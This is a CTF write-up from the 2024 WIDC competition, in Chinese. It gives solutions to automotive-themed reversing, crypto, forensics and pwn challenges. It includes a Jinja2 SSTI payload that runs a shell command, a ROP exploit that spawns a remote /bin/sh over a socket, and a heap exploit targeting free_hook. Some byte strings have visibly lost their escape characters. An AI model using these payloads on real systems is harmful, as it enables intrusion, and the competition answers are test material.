Day1-嵌入式程序简单逆向
逆向汇编代码得到加密逻辑为逐位将字符的ASCII码值加上3,再与9异或。将题目给的数据解base64后进行如上加密得到flag。
b64_decode_str = "lx9bma<lv]bc|azxeap:bv_k.l5:g;e9:g5g-ge:WnhNeGi=U6_-x]u^7XlpI;wZ^]"
# Re-apply the firmware's per-character transform, (ASCII + 3) XOR 9, to the
# already base64-decoded challenge data.
flag = "".join(chr((ord(ch) + 3) ^ 9) for ch in b64_decode_str)
print(flag)
#fr5lym6fpilovmtramz4lpkg8f14c7a54c1c9ca4SxbXaCeIQ0k9riqh3RfzE7sThi
Day1 -不安全的车企内网
登录时发现用户名会回显,响应头里面发现是flask,存在SSTI,使用以下exp完成攻击
import requests
# Lab instance used in the write-up (address as given on the page).
url = "http://172.10.0.21:8000/register"
# Jinja2 server-side template injection: the submitted user name is rendered
# as template *source*, so the expression below is evaluated on the server.
# The Flask-side fix is to pass user data as template variables
# (render_template(..., user=name)) and never build a template string from
# request input (render_template_string with concatenated input).
payload = '''
{{lipsum.__globals__['os'].popen('cat ./flag/flag').read()}}
'''
print(requests.post(url, data={"user": payload}).text)
Day1-IVIServer
原题链接:
https://7ee1n.github.io/2021/11/07/BSidesAhmedabadCTF2021/
from pwn import *
# Echo every byte sent and received; handy when aligning the response parse.
context.log_level='debug'
context.binary=ELF('./server')
elf=ELF('./server')
# libc shipped with the challenge; provides symbol offsets and gadgets below.
libc=ELF('./libc-2.31.so')
# Descriptor number the exploit assumes for the accepted client socket
# (consumed by the dup2 calls further down) — TODO confirm for the target.
SOCKFD = 4
def get(payload):
    """Open a fresh connection and send one crafted HTTP request.

    The request is laid out with pwntools' flat(): ``GET /`` at offset 0, a
    marker byte at offset 255 and *payload* (a ROP chain) at offset 0x138,
    with the gaps filled by ``filler``. The connection is kept in the global
    ``p`` so the caller can read the response afterwards.
    """
    global p
    p = remote('pwn.bsidesahmedabad.in', 9080)
    # NOTE(review): b'x00', b'rn' (and possibly b'r') look like escapes lost
    # during extraction (b'\x00', b'\r\n', b'\r'); as printed they are plain
    # letters and the request framing would be wrong.
    py=flat({
        0:b'GET /',
        255: b'r',
        0x138:[
            payload
        ],
    },filler=b'x00')
    p.send(py+b'rn')
# Stage 1: call the binary's own http_response with (4, &GOT[write]);
# presumably this writes the GOT entry back over the socket as a leak.
rop=ROP(elf)
rop.http_response(4,elf.got['write'])
get(rop.chain())
# NOTE(review): b'...n...' / b'x00' below appear to have lost their
# backslashes during extraction (b'\n', b'\x00').
p.recvuntil(b'</html>nHTTP/1.1')
# Leaked write() address minus its libc offset gives the libc load base.
libcbase=u64(p.recvline().strip().ljust(8,b'x00'))- libc.symbols['write']
success(hex(libcbase))
libc.address=libcbase
# Stage 2: second request with a libc ROP chain — point fds 0/1/2 at the
# socket (SOCKFD) and call system("/bin/sh").
rop = ROP(libc)
rop.dup2(SOCKFD, 0)
rop.dup2(SOCKFD, 1)
rop.dup2(SOCKFD, 2)
rop.system(next(libc.search(b'/bin/sh')))
get(rop.chain())
p.recvuntil(b'</html>n')
p.interactive()
Day1-车载通信协议
由1883端口判断是mqtt协议
存在匿名访问,使用mqtt-pwn工具连接,发现有名为flag的topic
用mqttfx客户端连接服务端,订阅flag主题,收到消息问想要什么
发布回答flag
收到消息,要玩猜数字游戏
二分法猜出数字后得到flag
Day2-车辆身份验证算法
from Crypto.Util.number import *
q = 31133702248881127631782881523509514476295949917122267121183371475000133184586174714396793644108294610935657329746903823657946536256899714076625760275173956706353888064555549064829709009640322743264038620966294636309911212621150898337629208482500384052935025619985047550270255090023343971256783414328092914248587672386617566422965425207785676797600936839556684715022346892107346366574407526099471338642307133437759220537846448437788211849588664491112404963383693116467782205041029098512207782583480993966604998421344660336431260561583879139849901548024253578304205860692342713953570388722937954933289936897205980716117
h = 7479856923878243888440888672844723062047571272556529760791388804749830947638106557467887553359594527284215983651237303197361839342245930727075103851252694200077479188468017448449313614412769738144700971711549137789290733004590838892989968103378686521773849802601405707815668581933555308957750986742176692804532749076668670300598708809281336336814136161669355533687195881130337149759522328766625901698480300656083599150462729901168306146171589266181628852056728470683680551973098848836293771016415271912573220080593590309888271888517605697277144430578513191280950815089968643259211353244436267567557456053045262878466
c = 429633025508597849623581682941413262998122137449005442145138470065847327103036727404626306379284511549714302199598866480970675273975210441015457022843111558443561825331941415126255871526201864795940071437602555024286559341823246182157480790439813986927891748029716157798569943993538191841077926115352987414280071817801043098050542082078666616788674806002113613279589438740909428444797915581688744647694596536620226032782501572321014769949362774191243994608572057792056353664666429685043726397327996076875440373242053749476708726634285972033216701275507339428064215442465140310384610569381749508378023099179079407328

# Two-dimensional lattice spanned by (h, 1) and (q, 0): any integer
# combination f*(h, 1) + k*(q, 0) is (f*h mod q, f), so a short reduced
# vector exposes the private pair (g, f) with h*f = g (mod q).
basis = matrix([[h, 1], [q, 0]])
g_short, f_short = basis.LLL()[0]
g = abs(g_short)
f = abs(f_short)

# Decrypt: a = f*c mod q, then recover the message as a * f^-1 mod g.
a = (f * c) % q
m = (inverse_mod(f, g) * a) % g
print(long_to_bytes(m))
Day2-蛛丝马迹
内存取证,用volatility先scanfile找到flag.txt的位置,然后dump得到flag.txt
fn6ldn8kwak16bwg07abade65c253267OvAsF2gk8WPfyhTHKGxEV0BIpQX3DdRuroLlCq76jZJzYa4neat
Day2-车机堆溢出利用
from pwn import *
context.log_level = 'debug'
#p=process('./pwn')
# 'ip' and `port` are placeholders for the challenge instance; `port` is
# not defined anywhere in this listing and must be set before running.
p=remote('ip',port)
# Values fed to the target's command parser. Their meaning (push/pop, switch
# to ESP, index value, subtract, divide) comes from the author's naming only
# and cannot be confirmed from this listing.
push = 0x2A3D
pop = 0xFFFF28
change2esp = -1
value2idx = 0x10101010
sub = 0x11111
div = 0x514
# Addresses in the target binary; an alternative system candidate was kept
# commented out.
# system = 0x08051830
system = 0x08051c60
free_hook = 0x80e09f0
# NOTE(review): under Python 3 `/` is true division, so this is 66.0 and
# create() serializes it as "66.0"; `//` is probably intended if the target
# parses an integer offset — confirm against the run that produced the flag.
heap_off = (0x110-0x8)/4
def create(d):
    """Serialize a sequence of values as one space-separated line.

    Every element is rendered with ``str`` (ints as decimal, strings as-is),
    which is the form the two ``sendline`` payloads below are built from.
    """
    return " ".join(map(str, d))
# First line sent: the command/argument values defined above, space-separated.
payload = create([push,push,push,push,change2esp,push,sub,div,value2idx])
# Second line sent: a '$0' marker followed by the system address, a count,
# the heap offset and the free_hook address (see the constants above).
payload1 = create(['$0',system,4,heap_off,free_hook])
p.sendline(payload)
p.sendline(payload1)
p.interactive()
Day2-OTA升级解密(pyc)
pyc的header不对,几个大版本的魔数试出来3.8的能正常反编译:
然后pycdc反编译:
# Source Generated with Decompyle++
# File: 92BFABA74B71D8262D96EF9F046B8F1E.pyc (Python 3.8)
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from cryptography.hazmat.primitives import padding
from cryptography.hazmat.backends import default_backend
import base64
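def encrypt(plaintext, key, iv):
    """Encrypt *plaintext* with AES-CBC under *key*/*iv* and return base64.

    Args:
        plaintext: bytes to encrypt; PKCS#7-padded to the 128-bit block size.
        key: AES key bytes (16 bytes in this challenge, i.e. AES-128).
        iv: 16-byte CBC initialization vector.

    Returns:
        The ciphertext encoded as a base64 ``str``.
    """
    # pycdc rendered the keyword argument as ``**('backend',)``; a tuple is
    # not a mapping and that call raises TypeError. The original source was
    # ``backend=default_backend()``.
    cipher = Cipher(algorithms.AES(key), modes.CBC(iv), backend=default_backend())
    padder = padding.PKCS7(128).padder()
    padded_plaintext = padder.update(plaintext) + padder.finalize()
    encryptor = cipher.encryptor()
    ciphertext = encryptor.update(padded_plaintext) + encryptor.finalize()
    return base64.b64encode(ciphertext).decode()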
# Fixed key and IV recovered from the pyc; the IV happens to be ASCII text.
key = b'asfdsf141fsad11f'
iv = b'MDEyMzQ1Njc4OWFi'
plaintext = 'flag'
# Baked-in ciphertext from the build; it is immediately overwritten below.
ciphertext = 'XalqLcjPTIHqHSnybH24Vy5BfobRchwUlKZpkfOmBoniTrW7dKgdgKg3npyW0ENJgkVlbHjKDTvj0UfSX6agvAGFVlgNV/HE2BS0ELZIM+xE3lU5LNDehjjKeW+ZhZuZjEohAqCJBsHX2zKMrtLlIQ=='
ciphertext = encrypt(plaintext.encode(), key, iv)
print('密文:', ciphertext)
简单AES,写脚本得出flag:
import base64
from Crypto.Cipher import AES
# Key and IV taken from the decompiled encrypt() call.
key = b'asfdsf141fsad11f'
iv = b'MDEyMzQ1Njc4OWFi'
ciphertext = 'XalqLcjPTIHqHSnybH24Vy5BfobRchwUlKZpkfOmBoniTrW7dKgdgKg3npyW0ENJgkVlbHjKDTvj0UfSX6agvAGFVlgNV/HE2BS0ELZIM+xE3lU5LNDehjjKeW+ZhZuZjEohAqCJBsHX2zKMrtLlIQ=='
aes = AES.new(key, AES.MODE_CBC, iv)
padded = aes.decrypt(base64.b64decode(ciphertext))
# Strip PKCS#7 padding: the last byte holds the pad length. This trusts the
# padding to be well-formed; a wrong key/IV would produce garbage unchecked.
pad_len = padded[-1]
flag = padded[:-pad_len]
print(flag)
# b'ff6jrwtydqnlkduhjg1ab9pxjv6cgb3da80c9dfb8d827YgQDvitKJT1yE3rqOB9klXf7zxcVmoHMPFeu5h0AsC2UbLSNI6Gpn4WdwRZ8jame'
Day2-硬件算法杂逆
foremost解包,解出来最后有五个文件,AES_encode是pyinstaller打包的文件,套路解包得出pyc:
$ python2 pyinstxtractor.py AES_encode
[+] Processing AES_encode
[+] Pyinstaller version: 2.1+
[+] Python version: 3.11
[+] Length of package: 8816359 bytes
[+] Found 40 files in CArchive
[+] Beginning extraction...please standby
[+] Possible entry point: pyiboot01_bootstrap.pyc
[+] Possible entry point: pyi_rth_inspect.pyc
[+] Possible entry point: AES_encode.pyc
[!] Warning: This script is running in a different Python version than the one used to build the executable.
[!] Please run this script in Python 3.11 to prevent extraction errors during unmarshalling
[!] Skipping pyz extraction
[+] Successfully extracted pyinstaller archive: AES_encode
You can now use a python decompiler on the pyc files within the extracted directory
因为3.11的pyc还没有支持的反编译工具,用pycdas分析出字节码再手撕:
AES_encode.pyc (Python 3.11)
[Code]
File Name: AES_encode.py
Object Name: <module>
Qualified Name: <module>
Arg Count: 0
Pos Only Arg Count: 0
KW Only Arg Count: 0
Stack Size: 6
Flags: 0x00000000
[Names]
'cryptography.hazmat.primitives.ciphers'
'Cipher'
'algorithms'
'modes'
'cryptography.hazmat.backends'
'default_backend'
'cryptography.hazmat.primitives'
'padding'
'simon_encode'
'encrypt_all'
'simon_decrypt'
'simon_decrypt_all'
'os'
'generate_key'
'aes_encrypt'
'key'
'open'
'file'
'read'
'strip'
'hex_key'
'encode'
'byte_key'
'plaintext'
'iv'
'ciphertext'
'print'
[Locals+Names]
[Constants]
0
(
'Cipher'
'algorithms'
'modes'
)
(
'default_backend'
)
(
'padding'
)
(
'encrypt_all'
)
(
'simon_decrypt_all'
)
None
[Code]
File Name: AES_encode.py
Object Name: generate_key
Qualified Name: generate_key
Arg Count: 0
Pos Only Arg Count: 0
KW Only Arg Count: 0
Stack Size: 4
Flags: 0x00000003 (CO_OPTIMIZED | CO_NEWLOCALS)
[Names]
'to_bytes'
[Locals+Names]
'original_hex'
[Constants]
None
0x3836353635367830L
32
'big'
(
'byteorder'
)
[Disassembly]
0 RESUME 0
2 LOAD_CONST 1: 0x3836353635367830L
4 STORE_FAST 0: original_hex
6 LOAD_FAST 0: original_hex
8 LOAD_METHOD 0: to_bytes
30 LOAD_CONST 2: 32
32 LOAD_CONST 3: 'big'
34 KW_NAMES 4
36 PRECALL 2
40 CALL 2
50 POP_TOP
52 LOAD_FAST 0: original_hex
54 LOAD_METHOD 0: to_bytes
76 LOAD_CONST 2: 32
78 LOAD_CONST 3: 'big'
80 KW_NAMES 4
82 PRECALL 2
86 CALL 2
96 RETURN_VALUE
[Code]
File Name: AES_encode.py
Object Name: aes_encrypt
Qualified Name: aes_encrypt
Arg Count: 2
Pos Only Arg Count: 0
KW Only Arg Count: 0
Stack Size: 6
Flags: 0x00000003 (CO_OPTIMIZED | CO_NEWLOCALS)
[Names]
'os'
'urandom'
'Cipher'
'algorithms'
'AES'
'modes'
'CBC'
'default_backend'
'encryptor'
'padding'
'PKCS7'
'padder'
'update'
'finalize'
[Locals+Names]
'plaintext'
'key'
'iv'
'cipher'
'encryptor'
'padder'
'padded_plaintext'
'ciphertext'
[Constants]
None
16
(
'backend'
)
128
[Disassembly]
0 RESUME 0
2 LOAD_GLOBAL 1: NULL + os
14 LOAD_ATTR 1: urandom
24 LOAD_CONST 1: 16
26 PRECALL 1
30 CALL 1
40 STORE_FAST 2: iv
42 LOAD_GLOBAL 5: NULL + Cipher
54 LOAD_GLOBAL 7: NULL + algorithms
66 LOAD_ATTR 4: AES
76 LOAD_FAST 1: key
78 PRECALL 1
82 CALL 1
92 LOAD_GLOBAL 11: NULL + modes
104 LOAD_ATTR 6: CBC
114 LOAD_FAST 2: iv
116 PRECALL 1
120 CALL 1
130 LOAD_GLOBAL 15: NULL + default_backend
142 PRECALL 0
146 CALL 0
156 KW_NAMES 2
158 PRECALL 3
162 CALL 3
172 STORE_FAST 3: cipher
174 LOAD_FAST 3: cipher
176 LOAD_METHOD 8: encryptor
198 PRECALL 0
202 CALL 0
212 STORE_FAST 4: encryptor
214 LOAD_GLOBAL 19: NULL + padding
226 LOAD_ATTR 10: PKCS7
236 LOAD_CONST 3: 128
238 PRECALL 1
242 CALL 1
252 LOAD_METHOD 11: padder
274 PRECALL 0
278 CALL 0
288 STORE_FAST 5: padder
290 LOAD_FAST 5: padder
292 LOAD_METHOD 12: update
314 LOAD_FAST 0: plaintext
316 PRECALL 1
320 CALL 1
330 LOAD_FAST 5: padder
332 LOAD_METHOD 13: finalize
354 PRECALL 0
358 CALL 0
368 BINARY_OP 0 (+)
372 STORE_FAST 6: padded_plaintext
374 LOAD_FAST 4: encryptor
376 LOAD_METHOD 12: update
398 LOAD_FAST 6: padded_plaintext
400 PRECALL 1
404 CALL 1
414 LOAD_FAST 4: encryptor
416 LOAD_METHOD 13: finalize
438 PRECALL 0
442 CALL 0
452 BINARY_OP 0 (+)
456 STORE_FAST 7: ciphertext
458 LOAD_FAST 2: iv
460 LOAD_FAST 7: ciphertext
462 BUILD_TUPLE 2
464 RETURN_VALUE
'flag.txt'
'r'
'cipflag:'
'randomiv:'
[Disassembly]
0 RESUME 0
2 LOAD_CONST 0: 0
4 LOAD_CONST 1: ('Cipher', 'algorithms', 'modes')
6 IMPORT_NAME 0: cryptography.hazmat.primitives.ciphers
8 IMPORT_FROM 1: Cipher
10 STORE_NAME 1: Cipher
12 IMPORT_FROM 2: algorithms
14 STORE_NAME 2: algorithms
16 IMPORT_FROM 3: modes
18 STORE_NAME 3: modes
20 POP_TOP
22 LOAD_CONST 0: 0
24 LOAD_CONST 2: ('default_backend',)
26 IMPORT_NAME 4: cryptography.hazmat.backends
28 IMPORT_FROM 5: default_backend
30 STORE_NAME 5: default_backend
32 POP_TOP
34 LOAD_CONST 0: 0
36 LOAD_CONST 3: ('padding',)
38 IMPORT_NAME 6: cryptography.hazmat.primitives
40 IMPORT_FROM 7: padding
42 STORE_NAME 7: padding
44 POP_TOP
46 LOAD_CONST 0: 0
48 LOAD_CONST 4: ('encrypt_all',)
50 IMPORT_NAME 8: simon_encode
52 IMPORT_FROM 9: encrypt_all
54 STORE_NAME 9: encrypt_all
56 POP_TOP
58 LOAD_CONST 0: 0
60 LOAD_CONST 5: ('simon_decrypt_all',)
62 IMPORT_NAME 10: simon_decrypt
64 IMPORT_FROM 11: simon_decrypt_all
66 STORE_NAME 11: simon_decrypt_all
68 POP_TOP
70 LOAD_CONST 0: 0
72 LOAD_CONST 6: None
74 IMPORT_NAME 12: os
76 STORE_NAME 12: os
78 LOAD_CONST 7: <CODE> generate_key
80 MAKE_FUNCTION 0
82 STORE_NAME 13: generate_key
84 LOAD_CONST 8: <CODE> aes_encrypt
86 MAKE_FUNCTION 0
88 STORE_NAME 14: aes_encrypt
90 PUSH_NULL
92 LOAD_NAME 13: generate_key
94 PRECALL 0
98 CALL 0
108 STORE_NAME 15: key
110 PUSH_NULL
112 LOAD_NAME 16: open
114 LOAD_CONST 9: 'flag.txt'
116 LOAD_CONST 10: 'r'
118 PRECALL 2
122 CALL 2
132 BEFORE_WITH
134 STORE_NAME 17: file
136 LOAD_NAME 17: file
138 LOAD_METHOD 18: read
160 PRECALL 0
164 CALL 0
174 LOAD_METHOD 19: strip
196 PRECALL 0
200 CALL 0
210 STORE_NAME 20: hex_key
212 LOAD_CONST 6: None
214 LOAD_CONST 6: None
216 LOAD_CONST 6: None
218 PRECALL 2
222 CALL 2
232 POP_TOP
234 JUMP_FORWARD 11 (to 258)
236 PUSH_EXC_INFO
238 WITH_EXCEPT_START
240 POP_JUMP_FORWARD_IF_TRUE 4
242 RERAISE 2
244 COPY 3
246 POP_EXCEPT
248 RERAISE 1
250 POP_TOP
252 POP_EXCEPT
254 POP_TOP
256 POP_TOP
258 LOAD_NAME 20: hex_key
260 LOAD_METHOD 21: encode
282 PRECALL 0
286 CALL 0
296 STORE_NAME 22: byte_key
298 LOAD_NAME 22: byte_key
300 STORE_NAME 23: plaintext
302 PUSH_NULL
304 LOAD_NAME 14: aes_encrypt
306 LOAD_NAME 23: plaintext
308 LOAD_NAME 15: key
310 PRECALL 2
314 CALL 2
324 UNPACK_SEQUENCE 2
328 STORE_NAME 24: iv
330 STORE_NAME 25: ciphertext
332 PUSH_NULL
334 LOAD_NAME 26: print
336 LOAD_CONST 11: 'cipflag:'
338 LOAD_NAME 25: ciphertext
340 FORMAT_VALUE 0
342 BUILD_STRING 2
344 PRECALL 1
348 CALL 1
358 POP_TOP
360 PUSH_NULL
362 LOAD_NAME 26: print
364 LOAD_CONST 12: 'randomiv:'
366 LOAD_NAME 24: iv
368 FORMAT_VALUE 0
370 BUILD_STRING 2
372 PRECALL 1
376 CALL 1
386 POP_TOP
388 LOAD_CONST 6: None
390 RETURN_VALUE
就是个AES解密,密文和iv都在flag里,在这里面找到key就行,写脚本:
from Crypto.Cipher import AES
# Key reconstructed from generate_key(): the integer constant is big-endian
# padded to 32 bytes, so this is AES-256.
key = 0x3836353635367830.to_bytes(32, byteorder='big')
# NOTE(review): the byte literals below appear to have lost their backslash
# escapes during extraction (e.g. 'xdd' for '\xdd'); as printed the IV is not
# 16 bytes and AES.new() would reject it. Restore the escapes before running.
aes = AES.new(key, AES.MODE_CBC, b'xddx92xd2x1axb8xe2<Hxb7xfaNx94xc8x1a$xb3')
flag = aes.decrypt(b'xebxb1J:}xb6xadSx89x86xabxe7x9bsxd5xebyxf2xdexd2nxf9xa3xa8Gkxb2$BEx03x9fxa1xf7xa9x19x85Sxa8Yxe2Vx98x8dx1eux84xbd`-xcaxd4xc3Em\xd1xa1xf7i6xcbx0cx842txccx94xe6x94xeeAxb4Hxd32hxf5x13K')
print(flag)
# fplkvjfixpal7zc8h0agc93ea464d53ec012poaSm0ZUeWT16JEctXsnjdQNYyhello
Day2-汽车算法逆向解密
题目描述说了AES,密文、key和iv都给了,直接写脚本解:
import base64
from Crypto.Cipher import AES
# Key, IV and ciphertext are all supplied base64-encoded in the task text.
key = base64.b64decode('7TapLcNbP8TqDWzwJElihy0TAFL/JCk7QZKtcuUKIvE=')
iv = base64.b64decode('Y64sxLZOyy0BSdBXsbzE/g==')
ciphertext = base64.b64decode('w61n0tWJKuyNjBN7rX8Bx/X2hcgpYCwhmCvaYSy3Omqk1Uj1RH9NtYi66amBTQm9f9hziWC0N5wLzRkGylIWbxOv0bLOwuqmXY2TigRyzWw=')
aes = AES.new(key, AES.MODE_CBC, iv)
# No unpadding is performed; the raw decrypted blocks are printed as-is.
flag = aes.decrypt(ciphertext)
print(flag)
# fvoelrnobjmfz1aknof7u24gfe5204521be119b3vOh9bsAqHGRlyXio6M0xtkEZ21nUmhelp
Day2-debug 算法逆向
密文在sec.txt里,计算flag的方法在native层的getFlag函数中
密文也是在运行时写入的:
密文长度56,在getFlag函数中可以知道是做了凯撒移位3+xor3的操作:
写脚本解密:
buf = b"jm0g3{djyalj{4og3k1vequwbi:f61:6f;36:;2dkkfAWRjSv2UFDukk"
# Undo the XOR-3 layer byte by byte; the Caesar shift is undone separately.
flag = [byte ^ 3 for byte in buf]
print(bytes(flag))
凯撒上dcode:
fk0a7udfwylfu4ia7e9rcosqxg6b2962b572658deebYQNfMr8SBDsee
Day2 - 车机的图片
后缀为apk的文件末尾有一张图片的base64:
提取出来fix即可:
Day2-安全驾驶的秘密
zsteg直接得到
fdnef8gmlmj476wye0uaw1g5ad0dc6fb6bb3fc6FQAnjXIzoykL37aUltxbdN4Ye05s6THvMggo
Day2-汽车身份验证
反编译发现aes密文,跟进找到key
解密获得flag :fhol9vnxra362og8be02e6880be34cb5cmxZWQrDBTkv7ijgabPEOJN9wKRfloor
Day2-一叶障目
zip方式打开docx看到flag
原文始发于微信公众号(SAINTSEC):2024WIDC WriteUp by SAINTSEC